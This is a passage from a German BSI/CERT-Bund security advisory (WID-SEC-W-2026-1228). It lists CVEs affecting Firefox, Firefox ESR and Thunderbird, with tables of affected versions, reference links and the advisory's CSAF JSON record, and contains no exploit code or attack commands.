Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6751

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6752

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6753

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6754

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6755

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6756

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6757

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6758

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6759

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6760

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6761

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6762

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6763

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6764

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6765

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6766

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6767

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6768

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6769

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6770

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6771

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6772

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6773

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6774

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6775

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6776

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6777

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6778

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6779

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6780

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6781

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6782

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6783

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6784

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6785

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

CVE-2026-6786

Affected products

Known affected 7 products

Product	Identifier	Version
Mozilla Firefox <150 Mozilla / Firefox		<150
Mozilla Firefox ESR <140.10 Mozilla / Firefox ESR		<140.10
Mozilla Firefox ESR <115.35 Mozilla / Firefox ESR		<115.35
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Mozilla Thunderbird <140.10 Mozilla / Thunderbird		<140.10
Mozilla Thunderbird <150 Mozilla / Thunderbird		<150
SUSE openSUSE SUSE	`cpe:/o:suse:opensuse:-`	—

References

13 references

URL	Category
https://wid.cert-bund.de/.well-known/csaf/white/2…	self
https://wid.cert-bund.de/portal/wid/securityadvis…	self
https://www.mozilla.org/en-US/security/advisories…	external
https://www.mozilla.org/en-US/security/advisories…	external
https://www.mozilla.org/en-US/security/advisories…	external
https://www.mozilla.org/en-US/security/advisories…	external
https://www.mozilla.org/en-US/security/advisories…	external
https://lists.debian.org/debian-lts-announce/2026…	external
https://nvd.nist.gov/vuln/detail/CVE-2026-6748	external
https://nvd.nist.gov/vuln/detail/CVE-2026-6750	external
https://lists.opensuse.org/archives/list/security…	external
https://security-tracker.debian.org/tracker/DSA-6229-1	external
https://lists.debian.org/debian-lts-announce/2026…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Thunderbird ist ein Open Source E-Mail Client.\r\nFirefox ist ein Open Source Web Browser.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erh\u00f6hen, um einen Denial of Service Angriff durchzuf\u00fchren, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2026-1228 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1228.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2026-1228 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1228"
      },
      {
        "category": "external",
        "summary": "Mozilla Security Advisory mfsa2026-30 vom 2026-04-21",
        "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-30/"
      },
      {
        "category": "external",
        "summary": "Mozilla Security Advisory mfsa2026-31 vom 2026-04-21",
        "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-31/"
      },
      {
        "category": "external",
        "summary": "Mozilla Security Advisory mfsa2026-32 vom 2026-04-21",
        "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-32"
      },
      {
        "category": "external",
        "summary": "Mozilla Security Advisory mfsa2026-33 vom 2026-04-21",
        "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-33/"
      },
      {
        "category": "external",
        "summary": "Mozilla Security Advisory mfsa2026-34 vom 2026-04-21",
        "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-34/"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DLA-4546 vom 2026-04-23",
        "url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00027.html"
      },
      {
        "category": "external",
        "summary": "National Vulnerability Database CVE-2026-6748 vom 2026-04-22",
        "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6748"
      },
      {
        "category": "external",
        "summary": "National Vulnerability Database CVE-2026-6750 vom 2026-04-22",
        "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6750"
      },
      {
        "category": "external",
        "summary": "openSUSE Security Update OPENSUSE-SU-2026:10610-1 vom 2026-04-25",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6VX2E6MLQKO7DPWQ4ZZHUP2YTTOARCJ2/"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DSA-6229 vom 2026-04-24",
        "url": "https://security-tracker.debian.org/tracker/DSA-6229-1"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DLA-4549 vom 2026-04-26",
        "url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00030.html"
      }
    ],
    "source_lang": "en-US",
    "title": "Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2026-04-26T22:00:00.000+00:00",
      "generator": {
        "date": "2026-04-27T08:44:16.530+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.5.0"
        }
      },
      "id": "WID-SEC-W-2026-1228",
      "initial_release_date": "2026-04-21T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2026-04-21T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2026-04-22T22:00:00.000+00:00",
          "number": "2",
          "summary": "Neue Updates von Debian aufgenommen"
        },
        {
          "date": "2026-04-23T22:00:00.000+00:00",
          "number": "3",
          "summary": "Anpassung CVSS Bewertung gem\u00e4\u00df NVD Angaben"
        },
        {
          "date": "2026-04-26T22:00:00.000+00:00",
          "number": "4",
          "summary": "Neue Updates von openSUSE und Debian aufgenommen"
        }
      ],
      "status": "final",
      "version": "4"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "category": "product_name",
            "name": "Debian Linux",
            "product": {
              "name": "Debian Linux",
              "product_id": "2951",
              "product_identification_helper": {
                "cpe": "cpe:/o:debian:debian_linux:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Debian"
      },
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c150",
                "product": {
                  "name": "Mozilla Firefox \u003c150",
                  "product_id": "T053198"
                }
              },
              {
                "category": "product_version",
                "name": "150",
                "product": {
                  "name": "Mozilla Firefox 150",
                  "product_id": "T053198-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:mozilla:firefox:150"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Firefox"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c140.10",
                "product": {
                  "name": "Mozilla Firefox ESR \u003c140.10",
                  "product_id": "T053196"
                }
              },
              {
                "category": "product_version",
                "name": "140.1",
                "product": {
                  "name": "Mozilla Firefox ESR 140.10",
                  "product_id": "T053196-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:mozilla:firefox_esr:140.10"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c115.35",
                "product": {
                  "name": "Mozilla Firefox ESR \u003c115.35",
                  "product_id": "T053197"
                }
              },
              {
                "category": "product_version",
                "name": "115.35",
                "product": {
                  "name": "Mozilla Firefox ESR 115.35",
                  "product_id": "T053197-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:mozilla:firefox_esr:115.35"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Firefox ESR"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c140.10",
                "product": {
                  "name": "Mozilla Thunderbird \u003c140.10",
                  "product_id": "T053194"
                }
              },
              {
                "category": "product_version",
                "name": "140.1",
                "product": {
                  "name": "Mozilla Thunderbird 140.10",
                  "product_id": "T053194-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:mozilla:thunderbird:140.10"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c150",
                "product": {
                  "name": "Mozilla Thunderbird \u003c150",
                  "product_id": "T053195"
                }
              },
              {
                "category": "product_version",
                "name": "150",
                "product": {
                  "name": "Mozilla Thunderbird 150",
                  "product_id": "T053195-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:mozilla:thunderbird:150"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Thunderbird"
          }
        ],
        "category": "vendor",
        "name": "Mozilla"
      },
      {
        "branches": [
          {
            "category": "product_name",
            "name": "SUSE openSUSE",
            "product": {
              "name": "SUSE openSUSE",
              "product_id": "T027843",
              "product_identification_helper": {
                "cpe": "cpe:/o:suse:opensuse:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-2781",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-2781"
    },
    {
      "cve": "CVE-2026-33626",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-33626"
    },
    {
      "cve": "CVE-2026-6746",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6746"
    },
    {
      "cve": "CVE-2026-6747",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6747"
    },
    {
      "cve": "CVE-2026-6748",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6748"
    },
    {
      "cve": "CVE-2026-6749",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6749"
    },
    {
      "cve": "CVE-2026-6750",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
      "release_date": "2026-04-21T22:00:00.000+00:00",
      "title": "CVE-2026-6750"
    },
    {
      "cve": "CVE-2026-6751",
      "product_status": {
        "known_affected": [
          "T053198",
          "T053196",
          "T053197",
          "2951",
          "T053194",
          "T053195",
          "T027843"
        ]
      },
